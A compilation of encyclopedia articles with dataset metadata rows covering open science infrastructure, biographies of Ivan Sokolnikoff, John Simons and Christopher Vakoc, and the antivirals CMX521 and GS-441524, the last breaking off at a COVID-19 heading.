Infrastructure
The use of the term "infrastructure" is an explicit reference to the physical infrastructures and networks such as power grids, road networks, or telecommunications that made it possible to run complex economic and social systems after the industrial revolution: "The term infrastructure has been used since the 1920s to refer collectively to the roads, power grids, telephone systems, bridges, rail lines, and similar public works that are required for an industrial economy to function (…) If infrastructure is required for an industrial economy, then we could say that cyberinfrastructure is required for a knowledge economy". The concept of infrastructure was notably extended in 1996 to forms of computer-mediated knowledge production by Susan Leigh Star and Karen Ruhleder, through an empirical observation of an early form of open science infrastructure, the Worm Community System. This definition has remained influential in science and technology studies through the next two decades and has affected the policy debate over the building of scientific infrastructures since the early 2000s.
Open science infrastructure have specific properties that contrast them with other forms of open science projects or initiatives:
Open science infrastructures are not simply a technical product but embed a set of tools, institutions, and social norms. Consequently, infrastructures are not always visible, as they can be largely hidden under the routine of normal activities. The resilience and tacitness of infrastructures makes it especially difficult to identify the real contributions and "labour cost" of open science work, as it remains "invisible in the university system". This also makes it difficult to allocate funding effectively, as critical infrastructure may remain undetected by funding bodies.
Open science infrastructures are durable and resilient. They are expected to run on a long-term basis, and multiple research programs rely on them. To some extent, infrastructures are successful when they are forgotten and become an integral part of routine research activities: "Infrastructure at its best is invisible. We tend to only notice it when it fails."
Open science infrastructures can be shared and used by different actors and communities. An infrastructure must be sufficiently consistent to remain coordinated and yet has to welcome a diverse array of local uses: "an infrastructure occurs when the tension between local and global is resolved". A predefined agreement on the scope and governance of the infrastructure among all stakeholders is a critical step.
Openness and the commons
Open science infrastructures are open, which differentiates them from other scientific and knowledge infrastructures and, more specifically, from subscription-based commercial infrastructures. Openness is both a core value and a directing principle that affects the aims, the governance, and the management of the infrastructure. Open science infrastructures face issues similar to those met by other open institutions, such as open data repositories or large-scale collaborative projects like Wikipedia: "When we study contemporary knowledge infrastructures we find values of openness often embedded there, but translating the values of openness into the design of infrastructures and the practices of infrastructuring is a complex and contingent process".
The conceptual definition of open science infrastructures has been largely influenced by Elinor Ostrom's analysis of the commons and, more specifically, of the knowledge commons. In accordance with Ostrom, Cameron Neylon underlines that open infrastructures are characterized not only by the management of a pool of common resources but also by the elaboration of common governance and norms. The economic theory of the commons makes it possible to expand beyond the limited scope of scholarly associations toward large-scale community-led initiatives: "Ostrom's work (…) provides a template (…) to make the transition from a local club to a community-wide infrastructure." Open science infrastructures tend to favor a not-for-profit, publicly funded model with strong involvement from scientific communities, which dissociates them from privately owned closed infrastructures: "open infrastructures are often scholar-led and run by non-profit organisations, making them mission-driven instead of profit-driven." This status aims to ensure the autonomy of the infrastructure and prevent its incorporation into commercial infrastructures. It has wide-ranging implications for the way the organization is managed: "the differences between commercial services and non-profit services permeated almost every aspect of their responses to their environment".
Open science infrastructures are not only a more specific subset of scientific infrastructures and cyberinfrastructures but may also include actors that would not fall into this definition. "Open access publication platforms" such as SciELO, OpenEdition, or the Open Library of Humanities are considered an integral part of open science infrastructures in the UNESCO definition and in several literature reviews and policy reports, whereas they were usually considered separate entities in the policy debate on cyberinfrastructures and e-infrastructures. In the 2010 report of the European Commission on e-infrastructure, scientific publishing platforms are "not e-Infrastructures but closely related to it".
Open science infrastructures may also incorporate additional values and ethical principles. Samuel Moore has theorized a form of "care-full" scholarly commons that does not yet exist but would incorporate latent forms of open science infrastructures and communities: "In addition to sharing resources with other projects, commoning also requires commoners to adopt an outwardly-focused, generous attitude to other commons projects, redirecting their labour away from proprietary." In 2018, Okune et al. introduced a similar concept of "inclusive knowledge infrastructures" that "deliberately allow for multiple forms of participation amongst a diverse set of actors (…) and seek to redress power relations within a given context."
Principles for open science infrastructures
In 2015, the Principles for Open Scholarly Infrastructure laid out an influential prescriptive definition of open science infrastructures. Subsequent definitions and terminologies of open science infrastructures have largely been elaborated on this basis. The text has also influenced the definition of open science infrastructure retained by UNESCO in November 2021.
The Principles attempt to hybridize the framework of infrastructure studies with the analysis of the commons initiated by Elinor Ostrom. They develop a series of recommendations in three areas critical to the success of open infrastructures:
Governance: the governance of the infrastructure should be open and accountable to the scientific communities it aims to serve. Specific measures should ensure that the management of the organization is transparent and diverse.
Sustainability: the core activities of the organization should be covered by recurring funds, and short-term subventions should be limited to short-term projects. While the organization may charge for services, charges should not extend to the data, which should remain "a community property".
Insurance: the technical infrastructure and the output of the organization are open. This ensures that the infrastructure can be recreated if necessary (in the jargon of open source, it becomes "forkable").
The text ends by mentioning several potential consequences of the principles. The authors advocate for a responsible centralization that embodies a different model than large commercial web platforms like Google and Facebook, while still maintaining the important benefits of centralized infrastructures: "we will be able to build accountable and trusted organisations that manage this centralization responsibly". Existing examples of large open infrastructures include ORCID, the Wikimedia Foundation, and CERN.
A more critical reception has focused on the underlying political philosophy of the Principles. While the scientific community is a key part of the governance of open science infrastructures, Samuel Moore underlines that it is never precisely defined, which raises potential issues of under-representation of minority groups.
History
Early developments (1950–1990)
Scientific projects have been among the earliest use cases for digital infrastructure. The theorization of scientific knowledge infrastructures even predates the development of computing technologies: the knowledge networks envisioned by Paul Otlet or Vannevar Bush already incorporated numerous features of online scientific infrastructures.
After the Second World War, the United States faced a "periodical crisis": existing journals could not keep up with the rapidly increasing scientific output. The issue became politically relevant after the successful launch of Sputnik: "The Sputnik crisis turned the librarians' problem of bibliographic control into a national information crisis." The emerging computing technologies were immediately considered a potential solution to make a larger amount of scientific output readable and searchable. Access to foreign-language publications was also a key issue expected to be solved by machine translation: in the 1950s, a significant share of scientific publications was not available in English, especially those coming from the Soviet bloc.
Influential members of the National Science Foundation like Joshua Lederberg advocated for the creation of a "centralized information system", SCITEL, that would at first coexist with printed journals and gradually replace them altogether on account of its efficiency. In the plan laid out by Lederberg to Eugene Garfield in November 1961, the deposit would index as many as 1,000,000 scientific articles per year. Beyond full-text searching, the infrastructure would also ensure the indexation of citations and other metadata, as well as the automated translation of foreign-language articles.
Although it anticipated key features of online scientific platforms, the SCITEL plan was technically unrealistic at the time. The first working prototype of an online retrieval system, developed in 1963 by Doug Engelbart and Charles Bourne at the Stanford Research Institute, was heavily constrained by memory issues: no more than 10,000 words from a few documents could be indexed.
Instead of a general-purpose publishing platform, the early scientific computing infrastructures focused on specific research areas, such as MEDLINE for medicine, NASA/RECON for space engineering, or OCLC Worldcat for library search: "most of the earliest online retrieval system provided access to a bibliographic database and the rest used a file containing another sort of information—encyclopedia articles, inventory data, or chemical compounds." This early development of scientific computing affected a large variety of disciplines and communities, including the social sciences: "The 1960s and 1970s saw the establishment of over a dozen services and professional associations to coordinate quantitative data collection". Yet these infrastructures were mostly invisible to researchers, as most of the search work was done by professional librarians. Not only were the search operating systems complicated to use, but searches had to be performed very efficiently given the prohibitive cost of long-distance telecommunications. To remain technically feasible, scientific infrastructures could never be open and became fundamentally hidden from their end users.
The development of digital infrastructures for scientific publication was largely undertaken by private companies. In 1963, Eugene Garfield created the Institute for Scientific Information, which aimed to transform the projects initially envisioned with Lederberg into a profitable business. The Science Citation Index relied on computational processing of citation data. It had a massive and lasting influence on the structuration of global scientific publication in the last decades of the 20th century, as its most important metric, the Journal Impact Factor, "ultimately came to provide the metric tool needed to structure a competitive market among journals". Garfield also successfully launched Current Contents, a periodic compilation of scientific abstracts that acted as a simplified commercial version of the central deposit envisioned within SCITEL. Rather than being replaced by a centralized information system, leading scientific publishers were able to develop their own information infrastructures, which ultimately reinforced their business position. By the end of the 1960s, the Dutch publisher Elsevier and the German publisher Springer had started to computerize their internal data, as well as the management of journal reviews.
Until the advent of the web, the landscape of scientific infrastructures remained fragmented. Projects and communities relied on their own unconnected networks at a national or institutional level: "the Internet was nearly invisible in Europe because people there were pursuing a separate set of network protocols". The birthplace of the World Wide Web, CERN, had its own version of the Internet, CERN-Net, and also supported its own protocol for e-mail exchange. The European Space Agency used its own iteration of the RECON system also used by NASA engineers (ESRO/RECON). These insulated scientific infrastructures could hardly be connected before the advent of the web. Communication between scientific infrastructures was challenging not only across space, but also across time. Whenever a communication protocol was no longer maintained, the data and knowledge it disseminated were likely to disappear as well: "the relationship between historical research and computing has been durably affected by aborted projects, data loss and unrecoverable formats".
The Web Revolution (1990–1995)
The World Wide Web was originally framed as an open scientific infrastructure. The project was inspired by ENQUIRE, an information management software commissioned from Tim Berners-Lee by CERN for the specific needs of high-energy physics. The structure of ENQUIRE was closer to an internal web of data: it connected "nodes" that "could refer to a person, a software module, etc. and that could be interlinked with various relations such as made, include, describes and so forth". While it "facilitated some random linkage between information", ENQUIRE was not able to "facilitate the collaboration that was desired for in the international high-energy physics research community". Like any significant scientific computing infrastructure before the 1990s, the development of ENQUIRE was ultimately impeded by the lack of interoperability and the complexity of managing network communications: "although Enquire provided a way to link documents and databases, and hypertext provided a common format in which to display them, there was still the problem of getting different computers with different operating systems to communicate with each other".
Sharing of data and data documentation was a major focus of the initial communication about the World Wide Web when the project was first unveiled in August 1991: "The WWW project was started to allow high energy physicists to share data, news, and documentation. We are very interested in spreading the web to other areas, and having gateway servers for other data".
The web rapidly superseded pre-existing online infrastructures, even when they included more advanced computing features. From 1991 to 1994, users of the Worm Community System, a major biology database on worms, switched to the Web and Gopher. While the Web did not include many advanced functions for data retrieval and collaboration, it was easily accessible. Conversely, the Worm Community System could only be browsed on specific terminals shared across scientific institutions: "To take on board the custom-designed, powerful WCS (with its convenient interface) is to suffer inconvenience at the intersection of work habits, computer use, and lab resources (…) The World-Wide Web, on the other hand, can be accessed from a broad variety of terminals and connections, and Internet computer support is readily available at most academic institutions and through relatively inexpensive commercial services."
The Web and similar protocols developed at the time had a similar impact on scientific publications. Early forms of open-access publishing were not developed by large-scale institutional infrastructures but through small initiatives. Universal access, regardless of the operating system, made it possible to maintain and share community-driven electronic journals years before online commercial scientific publishing became viable.
The first open-access repositories were individual or community initiatives as well. In August 1991, Paul Ginsparg created the first version of the arXiv project at the Los Alamos National Laboratory, in answer to recurring storage issues in academic mailboxes caused by the increasing sharing of scientific articles.
Building scientific infrastructures for the web (1995–2015)
The development of the World Wide Web rendered numerous pre-existing scientific infrastructures obsolete. It also lifted numerous restrictions and obstacles to online contribution and network management, which made it possible to attempt more ambitious projects. By the end of the 1990s, the creation of public scientific computing infrastructures became a major policy issue. The first wave of web-based scientific projects in the 1990s and early 2000s revealed critical issues of sustainability: as funding was allocated for a specific time period, critical databases, online tools, and publishing platforms could hardly be maintained, and project managers were faced with a valley of death "between grant funding and ongoing operational funding".
Several competing terms appeared to fill this need. In the United States, "cyberinfrastructure" was used in a scientific context by a US National Science Foundation (NSF) blue-ribbon committee in 2003: "The newer term cyberinfrastructure refers to infrastructure based upon distributed computer, information and communication technology. If infrastructure is required for an industrial economy, then we could say that cyberinfrastructure is required for a knowledge economy." "E-infrastructure" or "e-science" were used with a similar meaning in the United Kingdom and other European countries.
Thanks to "sizable investments", major national and international infrastructures were established between the initial policy discussions in the early 2000s and the economic crisis of 2007–2008, such as the Open Science Grid, BioGRID, the JISC, and Project Bamboo. Specialized free software for scientific publishing, like Open Journal Systems, became available after 2000. This development entailed a significant expansion of non-commercial open-access journals by facilitating the creation and administration of journal websites and the digital conversion of existing journals. Among the non-commercial journals registered in the Directory of Open Access Journals, the number of annual creations went from 100 by the end of the 1990s to 800 around 2010, and has not evolved significantly since then.
By 2010, infrastructures were "no longer in infancy" and yet "they are also not yet fully mature". While the development of the web solved a large range of technical issues regarding network management, building scientific infrastructures remained challenging. Governance, communication across all involved stakeholders, and strategic divergences were major factors of success or failure. One of the first major infrastructures for the humanities and the social sciences, Project Bamboo, was ultimately unable to achieve its ambitious aims: "From the early planning workshops to the Mellon Foundation's rejection of the project's final proposal attempt, Bamboo was dogged by its reluctance and/or inability to concretely define itself". This lack of clarity was further aggravated by recurring communication missteps between the project initiators and the community it aimed to serve: "The community had spoken and made it clear that continuing to emphasize Service-oriented architecture would alienate the very members of the community Bamboo was intended to benefit most: the scholars themselves". Budget cuts following the economic crisis of 2007–2008 underlined the fragility of ambitious infrastructure plans relying on significant recurring funds.
Leading commercial publishers were initially outpaced by the unexpected rise of the Web for academic publication: the executive board of Elsevier "had failed to grasp the significance of electronic publishing altogether, and therefore the deadly danger that it posed—the danger, namely, that scientists would be able to manage without the journal". The persistence of high revenues from subscriptions and the consolidation of the sector made it possible to fund the conversion of pre-existing online services to the web, as well as the digitization of past collections. By the 2010s, leading publishers were "moving from a content-provision to a data analytics business" and developed or acquired new key infrastructures for the management of scientific and pedagogic activities: "Elsevier has acquired and launched products that extend its influence and its ownership of the infrastructure to all stages of the academic knowledge production process". By expanding beyond publishing, these vertically integrated, privately owned infrastructures have become extensively integrated into daily research activities.
Toward open science infrastructures (2015–…)
The consolidation and expansion of commercial scientific infrastructures have entailed renewed calls to secure "community-controlled infrastructure". The acquisition of the open repositories Digital Commons and SSRN by Elsevier highlighted the lack of reliability of critical scientific infrastructures for open science. The SPARC report on European infrastructures underlines that "a number of important infrastructures [are] at risk and as a consequence, the products and services that comprise open infrastructure are increasingly being tempted by buyout offers from large commercial enterprises. This threat affects both not-for-profit open infrastructure as well as closed, and is evidenced by the buyout in recent years of commonly relied on tools and platforms such as SSRN, bepress, Mendeley, and Github."
In contrast with the consolidation of privately owned infrastructures, the open science movement "has tended to overlook the importance of social structures and systemic constraints in the design of new forms of knowledge infrastructures". It has remained mostly focused on the content of scientific research, with little integration of technical tools and few large community initiatives: "Common pool of resources is not governed or managed by the current scholarly commons initiative. There is no dedicated hard infrastructure and though there may be a nascent community, there is no formal membership."
More precise concepts were needed to embed the ethical principles of openness, community service, and autonomous governance in the building of infrastructures, and to ensure the transformation of small localized scholarly networks into large, "community-wide" structures. In 2013, Cameron Neylon underlined that the lack of common infrastructure was one of the main weaknesses of the open science ecosystem: "in a world where it can be cheaper to re-do an analysis than to store the data, we need to consider seriously the social, physical, and material infrastructure that might support the sharing of the material outputs of research". Two years later, Neylon, Geoffrey Bilder, and Jennifer Lin defined a series of Principles for Open Scholarly Infrastructure that reacted primarily to the discrepancy between the increasing openness of scientific publications and datasets and the closedness of the infrastructures that control their circulation.
Since 2015, these principles have become the most influential definition of open science infrastructures; they have been endorsed by leading infrastructures such as Crossref, OpenCitations, and Data Dryad, and have become a common basis for the institutional evaluation of existing open infrastructures. The main focus of the Principles is to build "trustworthy institutions" with significant commitments in terms of governance, financial sustainability, and technical efficiency, so that they can durably be relied on by scientific communities.
By 2021, public services and infrastructures for research had largely endorsed open science as an integral part of their activity and identity: "open science is the dominant discourse to which new online services for research refer." According to the 2021 Roadmap of the European Strategy Forum on Research Infrastructures (ESFRI), major legacy infrastructures in Europe have embraced open science principles: "Most of the Research Infrastructures on the ESFRI Roadmap are at the forefront of Open Science movement and make important contributions to the digital transformation by transforming the whole research process according to the Open Science paradigm." Examples of extensive data sharing programs include the European Social Survey (in the social sciences), ECRIN ERIC (for clinical data), and the Cherenkov Telescope Array (in astronomy).
In agreement with the original intent of the Principles, open science infrastructures are "seen as an antidote to the increased market concentration observed in the scholarly communication space." In November 2021, the UNESCO Recommendation on Open Science acknowledged open science infrastructures as one of the four pillars of open science, along with open science knowledge, open engagement of societal actors and open dialogue with other knowledge systems, and called for sustained investment and funding: "open science infrastructures are often the result of community-building efforts, which are crucial for their long-term sustainability and therefore should be not-for-profit and guarantee permanent and unrestricted access to all public to the largest extent possible."
The development of open scientific infrastructure has become a debated topic regarding the future of online scientific research. In January 2021, a collective of researchers called for a Plan I or Plan Infrastructure in reaction to perceived shortcomings of the international initiative for open science of the cOAlition S, the Plan S. In contrast with the focus of Plan S on scientific publication, Plan I aims to integrate all research outputs on large interoperable infrastructures: "research and scholarship are crucially dependent on an information infrastructure that treats all scholarly output, text, data and code, equally and that is based on open standards and open markets."
Organization of open infrastructures
Most of the landscape reports on open infrastructure have been undertaken in Europe and, to a lesser extent, in Latin America. For Europe, the main sources include the SPARC report from 2020, the OPERAS report on social science and humanities infrastructure, and the 2019 report of Katherine Skinner (which also extends to a few North American infrastructures). International studies include the European Commission's 2010 report on The Role of E-Infrastructure, which mostly received input from Europe, South America and North America.
These reports underline that important open science infrastructures may be already existing and yet remain invisible to funders and scientific policies: "alternative practices and projects exist inside and outside Europe, but these projects are almost invisible to the eyes of the public authorities".
Type and roles
Open Access repositories are the most frequent form of Open Science Infrastructure, with 5,791 repositories in existence in December 2021 according to OpenDOAR.
Yet there is a significant diversification of the roles and activities of open science infrastructures, at least among the largest ones. In the survey of European infrastructures conducted by SPARC Europe, 95% of the respondents mention that they provide services in at least three of six stages of research production (Creation, Evaluation, Publishing, Hosting, Discovering and Archiving). Aggregation, hosting and indexing are especially central activities, common to most Open Science Infrastructures regardless of their focus.
Specialization does happen at a higher level. A network analysis identifies "two main clusters of activities":
Publishing-focused infrastructures, which are associated with the "publishing and hosting traditional text formats". Among them, "paper submission (41 out of 70) and review (30) were the most commonly reported activities".
Creation-focused infrastructures, which deal preferably with the "processing and storing research outputs, particularly data". These actors provide specific services in the fields of "data gathering (47 out of 71), and data analysis (40)", while "computation and machine learning (18) and Experimentation (15) were roughly half as common".
Standards and technologies
Standardization is a major function of open science infrastructures, as they aim to ensure that the content they share and support is distributed consistently and is easy to reuse.
Maintaining open standards is one of the main challenges identified by leading European open infrastructures, as it implies choosing among competing standards in some cases, as well as ensuring that the standards are correctly updated and accessible through APIs or other endpoints. Two thirds of the respondents have undertaken an evaluation of their technological environment during the past year, to ensure that key components have not become obsolete. As a consequence of this sustained effort, most open infrastructures comply with the newly established standards of open science, such as FAIR data or Plan S.
Open science infrastructures preferentially integrate standards from other open science infrastructures. Among European infrastructures: "The most commonly cited systems – and thus essential infrastructure for many – are ORCID, Crossref, DOAJ, BASE, OpenAIRE, Altmetric, and Datacite, most of which are not-for-profit". Google Scholar is the most frequently mentioned commercial service, while Scopus, the leading proprietary academic search engine developed by Elsevier, is one of the least quoted leading services. Open science infrastructures are thus part of an emerging "truly interoperable Open Science commons" that holds the promise of "researcher-centric, low-cost, innovative, and interoperable tools for research, superior to the present, largely closed system."
Infrastructures are frequently dependent on choices made by external stakeholders, especially scientific publishers: they "do not themselves decide on the openness of content since they are dependent on the policies of content providers". This affects not only the content but also the "user data policies [that] are set by publishers which limits what can be made available".
Open Science Infrastructures have strong ties with the open source movement: 82% of the European infrastructures surveyed by SPARC claim to have partially built open source software, and 53% run their entire technological infrastructure on open source.
Governance
Governance has been self-identified as a potential weakness by the European infrastructures surveyed by SPARC, with less than half of the respondents considering that they are at a "mature" stage in this regard, and "good governance" quoted as the main challenge. Interaction between the communities they aim to support and the other stakeholders and funders is especially complicated: "One specific challenge identified was the tension between serving the needs of the community of users versus prioritising the needs of clients that provide financial support to the OSI".
The tension between centralization and diversity largely characterizes Open Science Infrastructures. While historically defined as a "centralized [Open Access] project", Redalyc aims to become a "community-based sustainable infrastructure in Latin America" (Becerril). The leading European open infrastructures have reported "challenges around ensuring sufficient (and sufficiently diverse) representation", as well as difficulty securing the involvement of some professional communities, such as researchers and librarians.
Audience
Open Science Infrastructures "target and serve a wide range of stakeholders". Researchers remain the primary target, but libraries, teachers and learners are among the expected audiences of more than half of the infrastructures surveyed by SPARC Europe.
A majority of European infrastructures "operate at a global scale", with English being the primary language of 82% of the respondents. These infrastructures are also frequently multilingual and integrate a specific national focus: they "provide access to a range of language content of local and international significance".
Open Science Infrastructures benefit diverse disciplines and scientific communities. In 2020, 72% of the European infrastructures surveyed by SPARC Europe claimed to support all disciplines. The social sciences and the humanities are the most mentioned disciplines, which is partly attributed to the fact that the survey was "distributed widely by the OPERAS network". In 2010, infrastructures supporting the social sciences and the humanities were much less prevalent, and most of the use cases came from "biosciences, High Energy Physics and other fields of physics, earth and environmental sciences, computer science, astronomy and astrophysics".
Economics
Many Open Science Infrastructures run "at a relatively low cost", as small infrastructures are an important part of the open science ecosystem. In 2020, 21 out of 53 surveyed European infrastructures "report spending less than €50,000". Consequently, more than 75% of surveyed European infrastructures are run by small teams of 5 FTEs or fewer. The size of an infrastructure and the extent of its funding are far from always proportional to the critical service it offers: "some of the most heavily used services make ends meet with a tiny core team of two to five people." Volunteer contributions are significant as well, which is both "a strength and weakness to an OSI's sustainability". The landscape of open science infrastructures is therefore rather close to the ideal of a "decentralised network of small projects" envisioned by theoreticians of the scholarly commons. A very large majority of open science infrastructures are non-commercial, and collaborations with, or financial support from, the private sector remain very limited.
Overall, European infrastructures were financially sustainable in 2020, which contrasts with the situation ten years prior: in 2010, European infrastructures had much less visibility, usually lacked "a long-term perspective" and struggled "with securing the funding for more than 5 years". In 2020, European infrastructures frequently relied on grants from national funds and from the European Commission; without these grants, most of these actors "could only remain viable for less than a year". Yet one quarter of surveyed European infrastructures were not supported by any grants or subventions and relied either on alternative sources of income or on voluntary contributions. As they can be "difficult to define adequately", open science infrastructures can be overlooked by funding bodies, which "contributes to the challenge of securing funding".
References
Bibliography
Definitions
Report
Book & thesis
Article
Conference
Other resources
Open science
Open access (publishing)
Data publishing | Open Science Infrastructure | [
"Technology"
] | 7,039 | [
"Data",
"Data publishing"
] |
63,829,771 | https://en.wikipedia.org/wiki/Ivan%20S.%20Sokolnikoff | Ivan Stephan Sokolnikoff (1901, Chernigov Province, Russian Empire – 16 April 1976, Santa Monica) was a Russian-American applied mathematician, who specialized in elasticity theory and wrote several mathematical textbooks for engineers and physicists.
Biography
Born to a wealthy family in Tsarist Russia, Ivan Sokolnikoff was educated by private tutors and at Anders Classical Gymnasium in Kiev. During the Russian Revolution, as a Tsarist naval officer, he was wounded in combat off the Kuril Islands. With the victory of the Reds, he became a refugee in China. There he worked for a subsidiary of an American electrical firm until 1922, when he emigrated to the United States, settling in Seattle. That year he matriculated at the University of Idaho, where he graduated with an electrical engineering degree in 1926. In 1930 he received his doctorate in mathematics from the University of Wisconsin–Madison. His doctoral dissertation, On a Solution of Laplace's Equation with an Application to the Torsion Problem for a Polygon with Reentrant Angles, was written under the supervision of Herman William March. In June 1931 Sokolnikoff married Elizabeth Thatcher Stafford. Between 1931 and 1941 they wrote five significant papers together, as well as the classic textbook Higher Mathematics for Engineers and Physicists. He joined the mathematics department of the University of Wisconsin–Madison as an instructor in 1927 and was promoted to full professor in 1941. He remained on the Wisconsin mathematics faculty until 1944.
During World War II Sokolnikoff lived in New York and Washington and did research on ship gun fire control for the National Defense Research Council. While he was on the East Coast, Elizabeth Stafford Sokolnikoff taught mathematics and remained in Madison, Wisconsin. Along with mathematics professors William LeRoy Hart (1892–1984) of the University of Minnesota and William Thomas Reid (1907–1977) of the University of Chicago, he organized a pre-meteorology program in which a number of academic institutions trained meteorologists for the U.S. armed forces. In 1946 he became a mathematics professor at the University of California, Los Angeles (UCLA), where he retired as professor emeritus in 1965. In 1947 he divorced his first wife and married Ruth Lawyer in December of that year.
Sokolnikoff was twice a visiting professor at Brown University. He was also twice a Guggenheim Fellow. His Guggenheim Fellowship for the academic year 1952-1953 was spent partly at the Royal Holloway College, London University and partly at the Free University of Brussels. His Guggenheim Fellowship for the academic year 1959–1960 was spent at the Swiss Federal Institute of Technology in Zürich. For the academic year 1962–1963 he held a Fulbright lecturing fellowship at Ankara's Middle East Technical University.
Upon his death he was survived by his widow and a daughter from his second marriage.
Selected publications
Articles
Books
with Elizabeth Stafford Sokolnikoff: Higher Mathematics for Engineers and Physicists, McGraw Hill, 1934, 2nd edition 1941
Advanced Calculus, McGraw Hill, 1939
The Mathematical Theory of Elasticity, McGraw Hill, 1946, 2nd edition 1956
Tensor Analysis - theory and applications to geometry and mechanics of continua, Wiley, 1951, 2nd edition 1964
with Raymond Redheffer: Mathematics of physics and modern engineering, McGraw Hill, 1958, 2nd edition 1966
References
20th-century American mathematicians
20th-century Russian mathematicians
Applied mathematicians
Russian emigrants to the United States
University of Idaho alumni
University of Wisconsin–Madison College of Letters and Science alumni
University of Wisconsin–Madison faculty
University of California, Los Angeles faculty
1901 births
1976 deaths | Ivan S. Sokolnikoff | [
"Mathematics"
] | 720 | [
"Applied mathematics",
"Applied mathematicians"
] |
63,830,786 | https://en.wikipedia.org/wiki/CMX521 | CMX521 is an antiviral drug discovered by Chimerix, which was developed for the treatment of norovirus, though it also shows efficacy against related viral diarrheas such as rotovirus and some sapoviruses, astroviruses and adenoviruses. It is a nucleoside analogue which acts as an inhibitor of viral RNA-dependant RNA polymerase.
See also
GS-441524
NITD008
Sangivamycin
References
Anti–RNA virus drugs
Antiviral drugs | CMX521 | [
"Biology"
] | 111 | [
"Antiviral drugs",
"Biocides"
] |
63,831,346 | https://en.wikipedia.org/wiki/John%20Simons%20%28chemist%29 | John Philip Simons (born 20 April 1934) is a British physical chemist known for his research in photochemistry and photophysics, molecular reaction dynamics and the spectroscopy of biological molecules. He was professor of physical chemistry at the University of Nottingham (1981–93) and Dr. Lee's Professor of Chemistry at the University of Oxford (1993–99).
Education
Simons studied at the University of Cambridge, graduating in 1955. His PhD is from Cambridge, under the supervision of Ronald George Wreyford Norrish.
Career
Simons first worked at the University of Birmingham, successively holding positions as an ICI Fellow (1960), lecturer (1961–67), reader (from 1975) and professor of photochemistry from 1979. In 1981 he became professor of physical chemistry at the University of Nottingham. In 1993 he was appointed Dr. Lee's Professor of Chemistry at the University of Oxford and fellow of Exeter College. He retired in 1999.
Research
Simons' initial research at the University of Birmingham investigated the dynamics of molecular photodissociation. The development of a high-speed rotor by Philip Burton Moon at Birmingham allowed Simons to apply this apparatus, with crossed molecular beams at supersonic speed, to the study of the dynamics of photochemical reactions and bimolecular collisions. At Nottingham, he started to use tuneable lasers to investigate reaction dynamics. He was a pioneer of the use of Doppler-resolved, polarised laser spectroscopy to generate three-dimensional images of molecules colliding (stereodynamics), and is regarded as "one of the founding fathers in the field of 'stereodynamics'".
His later research at Oxford used infrared and ultraviolet laser spectroscopy and quantum chemical calculations to investigate the three-dimensional structure and interactions of carbohydrates, peptides, neurotransmitters and other small biomolecules in the absence of environmental noise.
Awards and honours
Simons was elected Fellow of the Royal Society of Chemistry in 1979, and served as honorary secretary and president of the society's Faraday Division (1993–95). He became a Fellow of the Royal Society in 1989, and served on the society's Council (1999–2000). He gave the Royal Society's Humphry Davy Lecture (2001) and received the society's Davy Medal in 2007. Other awards include the Royal Society of Chemistry's Tilden Prize (1982–3), Chemical Dynamics Award (1993), Polanyi Medal (1996), Spiers Memorial Award (1999) and Liversidge Award (2007). He held a visiting Miller Professorship at the University of California, Berkeley.
In 2002 he received an honorary doctorate (DSc) from the University of Birmingham. In 2005, a special edition of the journal Molecular Physics was published to mark Simons' seventieth birthday the previous year.
Publications
Photochemistry and Spectroscopy (Wiley-Interscience; 1971) ()
References
External links
John Simons | Royal Society
Chemistry Tree
1934 births
20th-century English chemists
Academics of the University of Birmingham
Academics of the University of Nottingham
Academics of the University of Oxford
Dr Lee's Professors of Chemistry
British physical chemists
Spectroscopists
Fellows of the Royal Society
Fellows of the Royal Society of Chemistry
Living people | John Simons (chemist) | [
"Physics",
"Chemistry"
] | 669 | [
"Physical chemists",
"Spectrum (physical sciences)",
"Analytical chemists",
"Spectroscopists",
"Spectroscopy"
] |
63,832,050 | https://en.wikipedia.org/wiki/Christopher%20Vakoc | Christopher Vakoc is a molecular biologist and a professor at Cold Spring Harbor Laboratory.
Education
Vakoc graduated with a degree in Biochemistry from Pennsylvania State University in 2001. He then attained his M.D. and his Ph.D. from the University of Pennsylvania. His PhD research was performed with Gerd Blobel on the regulation of gene expression during hematopoiesis. In 2008, he established his own independent research group at Cold Spring Harbor Laboratory.
Career and research
Vakoc uses CRISPR/Cas9 technology to probe the epigenetic regulation of cancer and to identify new cancer drug targets. In 2011, Vakoc discovered that the epigenetic protein BRD4 was particularly important for leukemia, leading to a series of clinical trials with a new drug, JQ1. By studying cancer epigenetics, Vakoc has also identified a new subtype of lung cancer and has discovered how gene expression changes affect metastasis in pancreatic cancer.
Recently, Vakoc has developed a CRISPR screening approach to identify the protein domains that are most important for cancer growth.
Awards and honors
American Association for Cancer Research Outstanding Achievement Award, 2015
Pershing Square Sohn Cancer Research Alliance Prize, 2016
Paul Marks Prize for Cancer Research, 2019
References
Living people
Molecular biologists
Eberly College of Science alumni
University of Pennsylvania alumni
Year of birth missing (living people) | Christopher Vakoc | [
"Chemistry"
] | 296 | [
"Biochemists",
"Molecular biology",
"Molecular biologists"
] |
63,832,281 | https://en.wikipedia.org/wiki/GS-441524 | GS-441524 is a nucleoside analogue antiviral drug which was developed by Gilead Sciences. It is the main plasma metabolite of the antiviral prodrug remdesivir, and has a half-life of around 24 hours in human patients. Remdesivir and GS-441524 were both found to be effective in vitro against feline coronavirus strains responsible for feline infectious peritonitis (FIP), a lethal systemic disease affecting domestic cats. Remdesivir was never tested in cats (though some vets now offer it), but GS-441524 has been found to be effective treatment for FIP.
It is widely used despite lacking FDA approval, owing to Gilead's refusal to license the drug for veterinary use. In several countries, including Australia, the Netherlands, and the United Kingdom, oral GS-441524 tablets (and injectable remdesivir) have become legally available to vets for the treatment of FIP in cats.
Besides remdesivir, other prodrugs include obeldesivir (Gilead Sciences, Phase III) and deuremidevir (Vigonvita/Junshi, conditional approval in China).
Use and research
Feline infectious peritonitis
Since untreated feline infectious peritonitis (FIP) is fatal in almost all cases and in most countries there are no approved treatments available, GS-441524 has reportedly been sold illegally worldwide on the black market and used by pet owners to treat affected cats, although Gilead Sciences has refused to license the drug for veterinary use. Its efficacy for this purpose has been conclusively demonstrated in multiple trials, including field trials, and even in more complicated forms of FIP such as those with multisystemic or neurological involvement. In naturally infected cats, a recovery rate of over 80% has been observed with GS-441524 treatment in several studies and in treatment programs in countries where the drug is legalised.
As of 2023, oral GS-441524 tablets or capsules (and injectable remdesivir) became legally available to vets for the treatment of FIP in cats in Australia, the Netherlands, and the United Kingdom.
COVID-19
